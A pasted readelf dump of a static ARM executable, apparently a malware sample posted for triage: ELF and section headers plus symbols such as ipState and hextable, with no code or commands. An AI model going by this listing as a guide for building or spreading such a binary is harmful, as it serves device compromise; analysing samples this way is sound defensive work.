Advertisement
opexxx

bb018e03a58c4242729f6ae30e2c15c4

Dec 10th, 2015
188
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 159.70 KB | None | 0 0
  1.  
  2.  
  3. ELF Header:
  4.   Magic:   7f 45 4c 46 01 01 01 61 00 00 00 00 00 00 00 00
  5.   Class:                             ELF32
  6.   Data:                              2's complement, little endian
  7.  Version:                           1 (current)
  8.  OS/ABI:                            ARM
  9.  ABI Version:                       0
  10.  Type:                              EXEC (Executable file)
  11.  Machine:                           ARM
  12.  Version:                           0x1
  13.  Entry point address:               0x8190
  14.  Start of program headers:          52 (bytes into file)
  15.  Start of section headers:          143896 (bytes into file)
  16.  Flags:                             0x2, has entry point, GNU EABI
  17.  Size of this header:               52 (bytes)
  18.  Size of program headers:           32 (bytes)
  19.  Number of program headers:         3
  20.  Size of section headers:           40 (bytes)
  21.  Number of section headers:         20
  22.  Section header string table index: 17
  23.  
  24. Section Headers:
  25.  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  26.  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  27.  [ 1] .init             PROGBITS        00008094 000094 000018 00  AX  0   0  4
  28.  [ 2] .text             PROGBITS        000080b0 0000b0 019f18 00  AX  0   0 16
  29.  [ 3] .fini             PROGBITS        00021fc8 019fc8 000014 00  AX  0   0  4
  30.  [ 4] .rodata           PROGBITS        00021fdc 019fdc 002424 00   A  0   0  4
  31.  [ 5] .eh_frame         PROGBITS        00024400 01c400 000004 00   A  0   0  4
  32.  [ 6] .ctors            PROGBITS        0002d000 01d000 00000c 00  WA  0   0  4
  33.  [ 7] .dtors            PROGBITS        0002d00c 01d00c 000008 00  WA  0   0  4
  34.  [ 8] .jcr              PROGBITS        0002d014 01d014 000004 00  WA  0   0  4
  35.  [ 9] .data             PROGBITS        0002d020 01d020 00489c 00  WA  0   0 32
  36.  [10] .bss              NOBITS          000318bc 0218bc 008518 00  WA  0   0  4
  37.  [11] .comment          PROGBITS        00000000 0218bc 00111a 00      0   0  1
  38.  [12] .debug_aranges    PROGBITS        00000000 0229d8 0000a0 00      0   0  8
  39.  [13] .debug_info       PROGBITS        00000000 022a78 00030c 00      0   0  1
  40.  [14] .debug_abbrev     PROGBITS        00000000 022d84 000064 00      0   0  1
  41.  [15] .debug_line       PROGBITS        00000000 022de8 0002e7 00      0   0  1
  42.  [16] .debug_frame      PROGBITS        00000000 0230d0 0000a0 00      0   0  4
  43.  [17] .shstrtab         STRTAB          00000000 023170 0000a8 00      0   0  1
  44.  [18] .symtab           SYMTAB          00000000 023538 007f00 10     19 1117  4
  45.  [19] .strtab           STRTAB          00000000 02b438 004dd9 00      0   0  1
  46. Key to Flags:
  47.  W (write), A (alloc), X (execute), M (merge), S (strings)
  48.  I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
  49.  O (extra OS processing required) o (OS specific), p (processor specific)
  50.  
  51. There are no section groups in this file.
  52.  
  53. Program Headers:
  54.  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  55.  LOAD           0x000000 0x00008000 0x00008000 0x1c404 0x1c404 R E 0x8000
  56.  LOAD           0x01d000 0x0002d000 0x0002d000 0x048bc 0x0cdd4 RW  0x8000
  57.  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
  58.  
  59. Section to Segment mapping:
  60.  Segment Sections...
  61.   00     .init .text .fini .rodata .eh_frame
  62.   01     .ctors .dtors .jcr .data .bss
  63.   02    
  64.  
  65. There is no dynamic section in this file.
  66.  
  67. There are no relocations in this file.
  68.  
  69. There are no unwind sections in this file.
  70.  
  71. Symbol table '.symtab' contains 2032 entries:
  72.   Num:    Value  Size Type    Bind   Vis      Ndx Name
  73.     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND
  74.     1: 00008094     0 SECTION LOCAL  DEFAULT    1
  75.     2: 000080b0     0 SECTION LOCAL  DEFAULT    2
  76.     3: 00021fc8     0 SECTION LOCAL  DEFAULT    3
  77.     4: 00021fdc     0 SECTION LOCAL  DEFAULT    4
  78.     5: 00024400     0 SECTION LOCAL  DEFAULT    5
  79.     6: 0002d000     0 SECTION LOCAL  DEFAULT    6
  80.     7: 0002d00c     0 SECTION LOCAL  DEFAULT    7
  81.     8: 0002d014     0 SECTION LOCAL  DEFAULT    8
  82.     9: 0002d020     0 SECTION LOCAL  DEFAULT    9
  83.    10: 000318bc     0 SECTION LOCAL  DEFAULT   10
  84.    11: 00000000     0 SECTION LOCAL  DEFAULT   11
  85.    12: 00000000     0 SECTION LOCAL  DEFAULT   12
  86.    13: 00000000     0 SECTION LOCAL  DEFAULT   13
  87.    14: 00000000     0 SECTION LOCAL  DEFAULT   14
  88.    15: 00000000     0 SECTION LOCAL  DEFAULT   15
  89.    16: 00000000     0 SECTION LOCAL  DEFAULT   16
  90.    17: 00000000     0 SECTION LOCAL  DEFAULT   17
  91.    18: 00000000     0 SECTION LOCAL  DEFAULT   18
  92.    19: 00000000     0 SECTION LOCAL  DEFAULT   19
  93.    20: 00000000     0 FILE    LOCAL  DEFAULT  ABS initfini.c
  94.    21: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/sysdeps/linux/arm/cr
  95.    22: 00008094     0 NOTYPE  LOCAL  DEFAULT    1 $a
  96.    23: 00021fc8     0 NOTYPE  LOCAL  DEFAULT    3 $a
  97.    24: 00000000     0 FILE    LOCAL  DEFAULT  ABS crtstuff.c
  98.    25: 0002d020     0 OBJECT  LOCAL  DEFAULT    9 force_to_data
  99.    26: 0002d000     0 OBJECT  LOCAL  DEFAULT    6 __CTOR_LIST__
  100.    27: 0002d000     0 NOTYPE  LOCAL  DEFAULT    6 $d
  101.    28: 0002d00c     0 OBJECT  LOCAL  DEFAULT    7 __DTOR_LIST__
  102.    29: 0002d00c     0 NOTYPE  LOCAL  DEFAULT    7 $d
  103.    30: 00024400     0 OBJECT  LOCAL  DEFAULT    5 __EH_FRAME_BEGIN__
  104.    31: 0002d014     0 OBJECT  LOCAL  DEFAULT    8 __JCR_LIST__
  105.    32: 000318bc     1 OBJECT  LOCAL  DEFAULT   10 completed.2555
  106.    33: 0002d028     0 OBJECT  LOCAL  DEFAULT    9 p.2553
  107.    34: 0002d028     0 NOTYPE  LOCAL  DEFAULT    9 $d
  108.    35: 000080b0     0 FUNC    LOCAL  DEFAULT    2 __do_global_dtors_aux
  109.    36: 000080b0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  110.    37: 00008118     0 NOTYPE  LOCAL  DEFAULT    2 $d
  111.    38: 00008128     0 FUNC    LOCAL  DEFAULT    2 call___do_global_dtors_au
  112.    39: 00008128     0 NOTYPE  LOCAL  DEFAULT    2 $a
  113.    40: 00021fd4     0 NOTYPE  LOCAL  DEFAULT    3 $a
  114.    41: 000318c0    24 OBJECT  LOCAL  DEFAULT   10 object.2636
  115.    42: 00008130     0 FUNC    LOCAL  DEFAULT    2 frame_dummy
  116.    43: 00008174     0 NOTYPE  LOCAL  DEFAULT    2 $d
  117.    44: 00008188     0 FUNC    LOCAL  DEFAULT    2 call_frame_dummy
  118.    45: 00008188     0 NOTYPE  LOCAL  DEFAULT    2 $a
  119.    46: 000080a0     0 NOTYPE  LOCAL  DEFAULT    1 $a
  120.    47: 00000000     0 FILE    LOCAL  DEFAULT  ABS crtstuff.c
  121.    48: 000318b8     0 OBJECT  LOCAL  DEFAULT    9 force_to_data
  122.    49: 0002d008     0 OBJECT  LOCAL  DEFAULT    6 __CTOR_END__
  123.    50: 0002d010     0 OBJECT  LOCAL  DEFAULT    7 __DTOR_END__
  124.    51: 00024400     0 OBJECT  LOCAL  DEFAULT    5 __FRAME_END__
  125.    52: 0002d014     0 OBJECT  LOCAL  DEFAULT    8 __JCR_END__
  126.    53: 00021f8c     0 FUNC    LOCAL  DEFAULT    2 __do_global_ctors_aux
  127.    54: 00021f8c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  128.    55: 00021fbc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  129.    56: 00021fc0     0 FUNC    LOCAL  DEFAULT    2 call___do_global_ctors_au
  130.    57: 00021fc0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  131.    58: 000080a4     0 NOTYPE  LOCAL  DEFAULT    1 $a
  132.    59: 00000000     0 FILE    LOCAL  DEFAULT  ABS initfini.c
  133.    60: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/sysdeps/linux/arm/cr
  134.    61: 000080a8     0 NOTYPE  LOCAL  DEFAULT    1 $a
  135.    62: 00021fd8     0 NOTYPE  LOCAL  DEFAULT    3 $a
  136.    63: 00000000     0 FILE    LOCAL  DEFAULT  ABS libc/sysdeps/linux/arm/cr
  137.    64: 00008190     0 NOTYPE  LOCAL  DEFAULT    2 $a
  138.    65: 0002d02c     0 NOTYPE  LOCAL  DEFAULT    9 $d
  139.    66: 000081c0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  140.    67: 00000000     0 FILE    LOCAL  DEFAULT  ABS ran.c
  141.    68: 0002d030     0 NOTYPE  LOCAL  DEFAULT    9 $d
  142.    69: 0002d078     4 OBJECT  LOCAL  DEFAULT    9 c
  143.    70: 000081cc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  144.    71: 00008298     0 NOTYPE  LOCAL  DEFAULT    2 $d
  145.    72: 000318f4 16384 OBJECT  LOCAL  DEFAULT   10 Q
  146.    73: 0002d07c     4 OBJECT  LOCAL  DEFAULT    9 i.4134
  147.    74: 000082a0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  148.    75: 000083cc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  149.    76: 000083d8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  150.    77: 00008508   108 FUNC    LOCAL  DEFAULT    2 printchar
  151.    78: 00008574   388 FUNC    LOCAL  DEFAULT    2 prints
  152.    79: 000086f8   488 FUNC    LOCAL  DEFAULT    2 printi
  153.    80: 000088e0  1008 FUNC    LOCAL  DEFAULT    2 print
  154.    81: 00008ccc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  155.    82: 00008cd0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  156.    83: 00008e2c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  157.    84: 00008e30     0 NOTYPE  LOCAL  DEFAULT    2 $a
  158.    85: 000090a8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  159.    86: 000358f4     4 OBJECT  LOCAL  DEFAULT   10 fdopen_pids
  160.    87: 000090b8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  161.    88: 00009238     0 NOTYPE  LOCAL  DEFAULT    2 $d
  162.    89: 0000923c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  163.    90: 00022080  1024 OBJECT  LOCAL  DEFAULT    4 hextable
  164.    91: 00022080     0 NOTYPE  LOCAL  DEFAULT    4 $d
  165.    92: 00009388     0 NOTYPE  LOCAL  DEFAULT    2 $d
  166.    93: 0000938c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  167.    94: 00009828     0 NOTYPE  LOCAL  DEFAULT    2 $d
  168.    95: 00009830     0 NOTYPE  LOCAL  DEFAULT    2 $a
  169.    96: 00009910     0 NOTYPE  LOCAL  DEFAULT    2 $d
  170.    97: 00009918     0 NOTYPE  LOCAL  DEFAULT    2 $a
  171.    98: 00009c84     0 NOTYPE  LOCAL  DEFAULT    2 $d
  172.    99: 00009c8c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  173.   100: 0000a09c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  174.   101: 0000a0a4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  175.   102: 0000a39c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  176.   103: 0000a3a0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  177.   104: 000318ee     5 OBJECT  LOCAL  DEFAULT   10 ipState
  178.   105: 0000aa74     0 NOTYPE  LOCAL  DEFAULT    2 $d
  179.   106: 0000aa80     0 NOTYPE  LOCAL  DEFAULT    2 $a
  180.   107: 0000aadc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  181.   108: 0000aae0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  182.   109: 0000b0b0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  183.   110: 0000b0e0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  184.   111: 0000cb0c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  185.   112: 0000cb44     0 NOTYPE  LOCAL  DEFAULT    2 $a
  186.   113: 0000d9d4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  187.   114: 0000d9e0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  188.   115: 0000e078     0 NOTYPE  LOCAL  DEFAULT    2 $d
  189.   116: 0000e0a4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  190.   117: 0000f70c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  191.   118: 0000f768     0 NOTYPE  LOCAL  DEFAULT    2 $a
  192.   119: 0000f928     0 NOTYPE  LOCAL  DEFAULT    2 $d
  193.   120: 0000f934     0 NOTYPE  LOCAL  DEFAULT    2 $a
  194.   121: 0000fc04     0 NOTYPE  LOCAL  DEFAULT    2 $d
  195.   122: 0000fc18     0 NOTYPE  LOCAL  DEFAULT    2 $a
  196.   123: 000105b4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  197.   124: 00000000     0 FILE    LOCAL  DEFAULT  ABS /home/firmware/build/temp
  198.   125: 000105f0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  199.   126: 00000000     0 FILE    LOCAL  DEFAULT  ABS /home/firmware/build/temp
  200.   127: 00010700     0 NOTYPE  LOCAL  DEFAULT    2 $a
  201.   128: 00000000     0 FILE    LOCAL  DEFAULT  ABS /home/firmware/build/temp
  202.   129: 000107cc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  203.   130: 00000000     0 FILE    LOCAL  DEFAULT  ABS /home/firmware/build/temp
  204.   131: 000108b0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  205.   132: 00000000     0 FILE    LOCAL  DEFAULT  ABS libgcc2.c
  206.   133: 000108b4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  207.   134: 00000000     0 FILE    LOCAL  DEFAULT  ABS errno.c
  208.   135: 00010904   124 FUNC    LOCAL  DEFAULT    2 thread_self
  209.   136: 00010904     0 NOTYPE  LOCAL  DEFAULT    2 $a
  210.   137: 00010968     0 NOTYPE  LOCAL  DEFAULT    2 $d
  211.   138: 00010980     0 NOTYPE  LOCAL  DEFAULT    2 $a
  212.   139: 00000000     0 FILE    LOCAL  DEFAULT  ABS manager.c
  213.   140: 000109a0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  214.   141: 000109f8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  215.   142: 000109fc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  216.   143: 00010a80     0 NOTYPE  LOCAL  DEFAULT    2 $d
  217.   144: 000358f8     4 OBJECT  LOCAL  DEFAULT   10 terminated_children
  218.   145: 000358fc     4 OBJECT  LOCAL  DEFAULT   10 main_thread_exiting
  219.   146: 00010a8c    84 FUNC    LOCAL  DEFAULT    2 pthread_kill_all_threads
  220.   147: 00010a8c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  221.   148: 00010adc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  222.   149: 00010ae0   220 FUNC    LOCAL  DEFAULT    2 pthread_start_thread
  223.   150: 00010ae0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  224.   151: 00010bac     0 NOTYPE  LOCAL  DEFAULT    2 $d
  225.   152: 00010bbc    40 FUNC    LOCAL  DEFAULT    2 pthread_start_thread_even
  226.   153: 00010bbc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  227.   154: 00010be4   204 FUNC    LOCAL  DEFAULT    2 pthread_free
  228.   155: 00010ca0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  229.   156: 00010cb0     4 FUNC    LOCAL  DEFAULT    2 restart
  230.   157: 00010cb0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  231.   158: 00010cb4   312 FUNC    LOCAL  DEFAULT    2 pthread_reap_children
  232.   159: 00010ddc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  233.   160: 00010dec     0 NOTYPE  LOCAL  DEFAULT    2 $a
  234.   161: 00010f30     0 NOTYPE  LOCAL  DEFAULT    2 $d
  235.   162: 00010f48     0 NOTYPE  LOCAL  DEFAULT    2 $a
  236.   163: 000114ec     0 NOTYPE  LOCAL  DEFAULT    2 $d
  237.   164: 00035900     4 OBJECT  LOCAL  DEFAULT   10 pthread_threads_counter
  238.   165: 00011544     0 NOTYPE  LOCAL  DEFAULT    2 $a
  239.   166: 0001156c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  240.   167: 0002d080     0 NOTYPE  LOCAL  DEFAULT    9 $d
  241.   168: 000227c0     0 NOTYPE  LOCAL  DEFAULT    4 $d
  242.   169: 00000000     0 FILE    LOCAL  DEFAULT  ABS ptfork.c
  243.   170: 00011570    52 FUNC    LOCAL  DEFAULT    2 pthread_insert_list
  244.   171: 00011570     0 NOTYPE  LOCAL  DEFAULT    2 $a
  245.   172: 000115a4    36 FUNC    LOCAL  DEFAULT    2 pthread_call_handlers
  246.   173: 0001172c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  247.   174: 00035904    24 OBJECT  LOCAL  DEFAULT   10 pthread_atfork_lock
  248.   175: 0003591c     4 OBJECT  LOCAL  DEFAULT   10 pthread_atfork_prepare
  249.   176: 00035920     4 OBJECT  LOCAL  DEFAULT   10 pthread_atfork_child
  250.   177: 00035924     4 OBJECT  LOCAL  DEFAULT   10 pthread_atfork_parent
  251.   178: 0001175c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  252.   179: 000117ec     0 NOTYPE  LOCAL  DEFAULT    2 $d
  253.   180: 00000000     0 FILE    LOCAL  DEFAULT  ABS semaphore.c
  254.   181: 00011804    48 FUNC    LOCAL  DEFAULT    2 enqueue
  255.   182: 00011804     0 NOTYPE  LOCAL  DEFAULT    2 $a
  256.   183: 00011834    64 FUNC    LOCAL  DEFAULT    2 remove_from_queue
  257.   184: 00011884    68 FUNC    LOCAL  DEFAULT    2 __pthread_set_own_extrica
  258.   185: 000119e0   124 FUNC    LOCAL  DEFAULT    2 thread_self
  259.   186: 00011a44     0 NOTYPE  LOCAL  DEFAULT    2 $d
  260.   187: 00011a5c    72 FUNC    LOCAL  DEFAULT    2 new_sem_extricate_func
  261.   188: 00011a5c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  262.   189: 00011aa4     4 FUNC    LOCAL  DEFAULT    2 suspend
  263.   190: 00011c50     0 NOTYPE  LOCAL  DEFAULT    2 $d
  264.   191: 00011c58     0 NOTYPE  LOCAL  DEFAULT    2 $a
  265.   192: 00011d94     0 NOTYPE  LOCAL  DEFAULT    2 $d
  266.   193: 00011d98     0 NOTYPE  LOCAL  DEFAULT    2 $a
  267.   194: 00011eac     0 NOTYPE  LOCAL  DEFAULT    2 $d
  268.   195: 00000000     0 FILE    LOCAL  DEFAULT  ABS signals.c
  269.   196: 00011eb0     4 FUNC    LOCAL  DEFAULT    2 pthread_null_sighandler
  270.   197: 00011eb0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  271.   198: 00011eb4   124 FUNC    LOCAL  DEFAULT    2 thread_self
  272.   199: 00011f18     0 NOTYPE  LOCAL  DEFAULT    2 $d
  273.   200: 00011f30   100 FUNC    LOCAL  DEFAULT    2 pthread_sighandler_rt
  274.   201: 00011f30     0 NOTYPE  LOCAL  DEFAULT    2 $a
  275.   202: 00011f90     0 NOTYPE  LOCAL  DEFAULT    2 $d
  276.   203: 00035928   260 OBJECT  LOCAL  DEFAULT   10 sighandler
  277.   204: 00011f94   132 FUNC    LOCAL  DEFAULT    2 pthread_sighandler
  278.   205: 00011f94     0 NOTYPE  LOCAL  DEFAULT    2 $a
  279.   206: 00012014     0 NOTYPE  LOCAL  DEFAULT    2 $d
  280.   207: 00012018     0 NOTYPE  LOCAL  DEFAULT    2 $a
  281.   208: 00012130     0 NOTYPE  LOCAL  DEFAULT    2 $d
  282.   209: 00012148     0 NOTYPE  LOCAL  DEFAULT    2 $a
  283.   210: 000122a4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  284.   211: 000122b8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  285.   212: 00012340     0 NOTYPE  LOCAL  DEFAULT    2 $d
  286.   213: 00012344     0 NOTYPE  LOCAL  DEFAULT    2 $a
  287.   214: 0001242c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  288.   215: 00000000     0 FILE    LOCAL  DEFAULT  ABS spinlock.c
  289.   216: 00012438   100 FUNC    LOCAL  DEFAULT    2 __pthread_acquire
  290.   217: 00012438     0 NOTYPE  LOCAL  DEFAULT    2 $a
  291.   218: 00012498     0 NOTYPE  LOCAL  DEFAULT    2 $d
  292.   219: 0001249c    56 FUNC    LOCAL  DEFAULT    2 wait_node_free
  293.   220: 0001249c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  294.   221: 000124cc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  295.   222: 00035a30     4 OBJECT  LOCAL  DEFAULT   10 wait_node_free_list_spinl
  296.   223: 00035a2c     4 OBJECT  LOCAL  DEFAULT   10 wait_node_free_list
  297.   224: 000124d4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  298.   225: 000124dc   124 FUNC    LOCAL  DEFAULT    2 thread_self
  299.   226: 00012540     0 NOTYPE  LOCAL  DEFAULT    2 $d
  300.   227: 00012558     4 FUNC    LOCAL  DEFAULT    2 suspend
  301.   228: 00012558     0 NOTYPE  LOCAL  DEFAULT    2 $a
  302.   229: 000126d8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  303.   230: 000126e0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  304.   231: 00000000     0 FILE    LOCAL  DEFAULT  ABS wrapsyscall.c
  305.   232: 000127f4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  306.   233: 00000000     0 FILE    LOCAL  DEFAULT  ABS pthread.c
  307.   234: 0001302c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  308.   235: 00013038     0 NOTYPE  LOCAL  DEFAULT    2 $d
  309.   236: 00031538     4 OBJECT  LOCAL  DEFAULT    9 current_rtmin
  310.   237: 0001303c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  311.   238: 00013048     0 NOTYPE  LOCAL  DEFAULT    2 $d
  312.   239: 0003153c     4 OBJECT  LOCAL  DEFAULT    9 current_rtmax
  313.   240: 0001304c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  314.   241: 00013098     0 NOTYPE  LOCAL  DEFAULT    2 $d
  315.   242: 000130a0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  316.   243: 000130dc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  317.   244: 000130e0   124 FUNC    LOCAL  DEFAULT    2 thread_self
  318.   245: 000130e0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  319.   246: 00013144     0 NOTYPE  LOCAL  DEFAULT    2 $d
  320.   247: 0001315c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  321.   248: 0001316c     4 FUNC    LOCAL  DEFAULT    2 pthread_handle_sigdebug
  322.   249: 00013180     0 NOTYPE  LOCAL  DEFAULT    2 $d
  323.   250: 00035a4c     4 OBJECT  LOCAL  DEFAULT   10 current_level
  324.   251: 00013184     0 NOTYPE  LOCAL  DEFAULT    2 $a
  325.   252: 00013190     0 NOTYPE  LOCAL  DEFAULT    2 $d
  326.   253: 00013194     0 NOTYPE  LOCAL  DEFAULT    2 $a
  327.   254: 0001328c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  328.   255: 00013294     0 NOTYPE  LOCAL  DEFAULT    2 $a
  329.   256: 000132a4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  330.   257: 000132a8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  331.   258: 00013304     0 NOTYPE  LOCAL  DEFAULT    2 $d
  332.   259: 00013308     4 FUNC    LOCAL  DEFAULT    2 suspend
  333.   260: 00013308     0 NOTYPE  LOCAL  DEFAULT    2 $a
  334.   261: 0001330c   180 FUNC    LOCAL  DEFAULT    2 pthread_onexit_process
  335.   262: 000133ac     0 NOTYPE  LOCAL  DEFAULT    2 $d
  336.   263: 000133c0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  337.   264: 00013444     0 NOTYPE  LOCAL  DEFAULT    2 $d
  338.   265: 00013460     0 NOTYPE  LOCAL  DEFAULT    2 $a
  339.   266: 000134dc     0 NOTYPE  LOCAL  DEFAULT    2 $d
  340.   267: 000134e8   456 FUNC    LOCAL  DEFAULT    2 pthread_initialize
  341.   268: 000134e8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  342.   269: 0001367c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  343.   270: 00013a68    40 FUNC    LOCAL  DEFAULT    2 pthread_handle_sigrestart
  344.   271: 000139b4   180 FUNC    LOCAL  DEFAULT    2 pthread_handle_sigcancel
  345.   272: 0002d004     0 NOTYPE  LOCAL  DEFAULT    6 $d
  346.   273: 000136b0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  347.   274: 000138b0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  348.   275: 00035a48     4 OBJECT  LOCAL  DEFAULT   10 __libc_multiple_threads_p
  349.   276: 000138f4     0 NOTYPE  LOCAL  DEFAULT    2 $a
  350.   277: 000139ac     0 NOTYPE  LOCAL  DEFAULT    2 $d
  351.   278: 000139b0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  352.   279: 00013a58     0 NOTYPE  LOCAL  DEFAULT    2 $d
  353.   280: 00013a68     0 NOTYPE  LOCAL  DEFAULT    2 $a
  354.   281: 00013aa8     0 NOTYPE  LOCAL  DEFAULT    2 $d
  355.   282: 00013aac     0 NOTYPE  LOCAL  DEFAULT    2 $a
  356.   283: 00013b68     0 NOTYPE  LOCAL  DEFAULT    2 $d
  357.   284: 00013b70     0 NOTYPE  LOCAL  DEFAULT    2 $a
  358.   285: 00013c18     0 NOTYPE  LOCAL  DEFAULT    2 $d
  359.   286: 000310a0     0 NOTYPE  LOCAL  DEFAULT    9 $d
  360.   287: 000227c8     0 NOTYPE  LOCAL  DEFAULT    4 $d
  361.   288: 00000000     0 FILE    LOCAL  DEFAULT  ABS attr.c
  362.   289: 00013c1c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  363.   290: 00000000     0 FILE    LOCAL  DEFAULT  ABS cancel.c
  364.   291: 00013e24   124 FUNC    LOCAL  DEFAULT    2 thread_self
  365.   292: 00013e24     0 NOTYPE  LOCAL  DEFAULT    2 $a
  366.   293: 00013e88     0 NOTYPE  LOCAL  DEFAULT    2 $d
  367.   294: 00013ea0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  368.   295: 000141d0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  369.   296: 00000000     0 FILE    LOCAL  DEFAULT  ABS condvar.c
  370.   297: 000141d8    48 FUNC    LOCAL  DEFAULT    2 enqueue
  371.   298: 000141d8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  372.   299: 00014208    64 FUNC    LOCAL  DEFAULT    2 remove_from_queue
  373.   300: 000142ac    68 FUNC    LOCAL  DEFAULT    2 __pthread_set_own_extrica
  374.   301: 000142f0     4 FUNC    LOCAL  DEFAULT    2 restart
  375.   302: 0001434c   124 FUNC    LOCAL  DEFAULT    2 thread_self
  376.   303: 000143b0     0 NOTYPE  LOCAL  DEFAULT    2 $d
  377.   304: 000143c8    72 FUNC    LOCAL  DEFAULT    2 cond_extricate_func
  378.   305: 000143c8     0 NOTYPE  LOCAL  DEFAULT    2 $a
  379.   306: 00014410     4 FUNC    LOCAL  DEFAULT    2 suspend
  380.   307: 0001460c     0 NOTYPE  LOCAL  DEFAULT    2 $d
  381.   308: 00014618     0 NOTYPE  LOCAL  DEFAULT    2 $a
  382.   309: 000147a4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  383.   310: 000147b0     0 NOTYPE  LOCAL  DEFAULT    2 $a
  384.   311: 00000000     0 FILE    LOCAL  DEFAULT  ABS events.c
  385.   312: 00014800     0 NOTYPE  LOCAL  DEFAULT    2 $a
  386.   313: 00000000     0 FILE    LOCAL  DEFAULT  ABS join.c
  387.   314: 0001480c    68 FUNC    LOCAL  DEFAULT    2 __pthread_set_own_extrica
  388.   315: 0001480c     0 NOTYPE  LOCAL  DEFAULT    2 $a
  389.   316: 00014850   124 FUNC    LOCAL  DEFAULT    2 thread_self
  390.   317: 000148b4     0 NOTYPE  LOCAL  DEFAULT    2 $d
  391.   318: 000148cc    76 FUNC    LOCAL  DEFAULT    2 join_extricate_func
  392.   319: 000148cc     0 NOTYPE  LOCAL  DEFAULT    2 $a
  393.   320: 00014918     4 FUNC    LOCAL  DEFAULT    2 suspend
  394.   321: 00014a28     0 NOTYPE  LOCAL  DEFAULT    2 $d
  395.   322: 00014a38     0 NOTYPE  LOCAL  DEFAULT    2 $a
  396.   323: 00014c14     0 NOTYPE  LOCAL  DEFAULT    2 $d
  397.   324: 00014c20     0 NOTYPE  LOCAL  DEFAULT    2 $a
  398.   325: 00014d18     0 NOTYPE  LOCAL  DEFAULT    2 $d
  399.   326: 00000000     0 FILE    LOCAL  DEFAULT  ABS lockfile.c
  400.   327: 00014d20     0 NOTYPE  LOCAL  DEFAULT    2 $a
  401.   328: 00014d78     0 NOTYPE  LOCAL  DEFAULT    2 $d
  402.   329: 00000000     0 FILE    LOCAL  DEFAULT  ABS mutex.c
